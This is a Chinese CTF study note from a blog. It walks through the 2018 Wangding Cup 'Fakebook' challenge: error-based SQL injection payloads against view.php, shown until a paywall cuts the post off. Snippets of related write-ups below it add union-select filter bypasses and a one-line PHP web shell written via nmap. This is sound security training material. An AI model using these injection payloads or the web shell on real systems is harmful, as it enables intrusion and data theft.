【学习笔记 28】 buu [网鼎杯 2018]Fakebook

最新推荐文章于 2024-04-24 17:24:28 发布
最新推荐文章于 2024-04-24 17:24:28 发布
阅读量327 收藏 1
点赞数 2
分类专栏: 学习笔记 sql注入 SSRF 文章标签: php 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107639763
版权
本文详细介绍了2018年网鼎杯Fakebook挑战的解决过程,涉及到知识点包括SSRF(服务器端请求伪造)、SQL注入、序列化字符串构造以及如何通过这些技术获取隐藏信息。通过注册用户,发现SQL报错注入,进一步利用SSRF和反序列化漏洞,最终解密flag获取答案。
摘要由CSDN通过智能技术生成

0x00 知识点

  1. robots.txt文件泄露
  2. SSRF(服务器端请求伪造)
  3. 多种SQL注入以及绕过
  4. 构造序列化字符串

0x01 知识点详解

  1. 什么是SSRF?
    答:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
    详情推荐去看这个大佬的文章
  2. 什么是序列化,什么是反序列化?
    这里直接放上我之前的文章

0x02 解题思路

  1. 打开网站,发现网站题目是fakebook,可以登录注册,其他没有什么功能。
  2. 尝试注册一个用户,这里注意这个blog必须要以http或者https开头不然没有办法注册。
    请添加图片描述注册成功后就是这样的。
  3. 打开用户界面,页面内没有什么有用的信息,但是在url地址栏里发现疑似注入点的地方在这里插入图片描述尝试用(’)测试,观察回显的不同,推测这里是个报错注入。
    在这里插入图片描述
  4. 尝试构造payload看看能不能在数据库中得到什么信息
    先来查一下数据库
payload:
view.php?no=1 and extractvalue(1,concat('~',(select(group_concat(database())))))%23

在这里插入图片描述这里奇怪的是把0x7e给过滤掉了,~反而没有过滤。
知道了库名后,继续爆表

payload:
view.php?no=1 and extractvalue(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='fakebook')
最低0.47元/天 解锁文章
Noslpum
关注
专栏目录
【网络安全 | CTF】fakebook网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
BUUCT-WEB-Fakebook
迷风小白
07-08 4119
Fakebook 扫描目录发现存在robots.txt和flag.php,访问发现源码泄露/user.php.bak user.php.bak <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct(...
buu做题笔记——[网鼎杯 2018]Fakebook
weixin_46330722的博客
11-16 266
BUU[网鼎杯 2018]Fakebook [网鼎杯 2018]Fakebook 进入题目就只有login和join两个按钮 我们先创建一个用户。 这里注意blog需要是个网址,不然会注册失败。注册成功后就能在列表中看到,这个和之前做的SWPUCTF2019 wb1很像,一开始我以为也是个二次注入,就在这试了一会儿,结果发现不是。我们点开自己注册的用户。 发现url上有个no参数,有可能存在注入,加个单引号试试。 有报错,应该是存在注入的。试了一会发现这个参数没有被单引号包裹,直接注就行。但是在联
BUUOJ Fakebook
沐目的博客
10-22 574
关于源码泄露,我是真的懂的不多,而且刚开始发现有SQL注入,我以为就没了,但最后发现根本不是。 1.源码泄露 这题的关键点,就是找到源码,而找源码,就需要有好的工具(nikto)。存在robots.txt文件,里面有源码的路径。而再用御剑,发现falg.php文件。啥时候可以有一个完美的扫描工具。这还得扫两遍,谁能想的到! <?php class UserInfo { public...
BUUCTF Fakebook
weixin_44377940的博客
03-18 946
注册一个admin账户,然后登陆,没有发现什么东西。 点进view.php一看,发现好像有个注入点。 尝试注入,发现对union进行了过滤,可以用/**/进行绕过。 可以看到有一个反序列化,然后我就没有思路了。 看了wp才知道,还有个备份文件user.php.bak和flag.php,user.php.bak代码如下: <?php class UserInfo { public...
buuctf-Fakebook(报错注入)
m0_62094846的博客
04-04 2407
blog要有http:// 可以尝试sql注入,但是我用sqlmap注入不了,不知道为什么 然后尝试手工,试过很多闭合方式都不行,后来发现直接就是整型注入 正确的情况不会有回显,错误会有,试试报错注入 这里有个之前没见过的过滤方式,过滤了0x7e,要用~(本来以为过滤了updatexml,想用另一个来着) 查当前数据库 ?no=1 and updatexml(1,concat('~',(database()),'~'),1)# 查所有数据库 ?no=1 and...
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 320
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
学习笔记 48】 buu [网鼎杯 2020 朱雀组]Nmap
weixin_43553654的博客
08-11 744
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php
BUUCTF WEB Fakebook
A_dmin的博客
12-20 653
BUUCTF WEB Fakebook 进入页面发现有个登录有个注册!!! 注册一个账号登录: 有个参数,下面应该是会显示你网址的博客地址!!! 有参数肯定是进行SQL注入尝试!!发现存在盲注!no=1=1=1与no=1=0=1回显是不一样的!! 不过好像还有报错注入!!有四个字段!! 后面发现空格被过滤了??使用/**/代替,存在报错注入: 尝试注入: ...
BUUCTF——[网鼎杯 2018]Fakebook
最新发布
m_de_g的博客
04-24 739
【代码】BUUCTF——[网鼎杯 2018]Fakebook
BUUCTF:[网鼎杯 2018]Fakebook
末初的CSDN博客
11-06 2229
题目地址:https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202018]Fakebook 查看robots.txt,发现user.php.bak 下载user.php.bak <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct(.
BUUCTF】[网鼎杯 2018]Fakebook
algae
05-06 804
工具扫描,发现有/user.php.bak 下载下来 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->n...
[网鼎杯 2018]Fakebook
pakho_C的博客
02-12 1384
web第32题 [网鼎杯 2018]Fakebook 打开靶场 一个简单的登陆和注册并发布博客的页面 尝试join页面注册始终提示blog is not valid,应该是做了某种限制,又获取不到源码,那直接用dirmap来一波目录扫描看看了 得到2个比较敏感的文件,先访问一下view.php 竟然报错了,而且像是sql的报错 再访问一下robots.txt。这个文件通常用来保存服务器的一些敏感信息 提示了一个.bak后缀的备份文件。直接访问,下载下来 得到user.php的源码 <?php
BUUCTF__[网鼎杯 2018]Fakebook_题解
风过江南乱的博客
07-04 2107
BUUCTF__[网鼎杯 2018]Fakebook_题解
FacebookCTF2019 web writeup
river
06-05 3356
facebookCTF2019 rceservice - 绕过preg_match http://challenges.fbctf.com:8085 We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...
BUUCTF [FBCTF2019] Products Manager
Senimo
01-08 1502
BUUCTF [FBCTF2019] Products Manager 考点: 启动环境: 产品管理,其中有三个功能: 查看前5的产品 添加产品 查看产品细节 知道了大致功能,尝试正常的业务逻辑,首先添加产品,其Secret值需包含10位以上的大小写字母和数字: 添加成功,查询产品细节: 分析题目给出的源码: 其中footer.php页面没用,header.php页面只是首页的三个跳转链接,index.php页面也没有可利用内容。 在db.php页面中,查看到如下SQL语句: CREATE
BUUCT-WEB-easy_tornado
迷风小白
07-02 7590
easy_tornado tornado是python中的一个web应用框架。 拿到题目发现有三个文件 flag.txt /flag.txt flag in /fllllllllllllag 发现flag在/fllllllllllllag文件里 welcome.txt /welcome.txt render render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值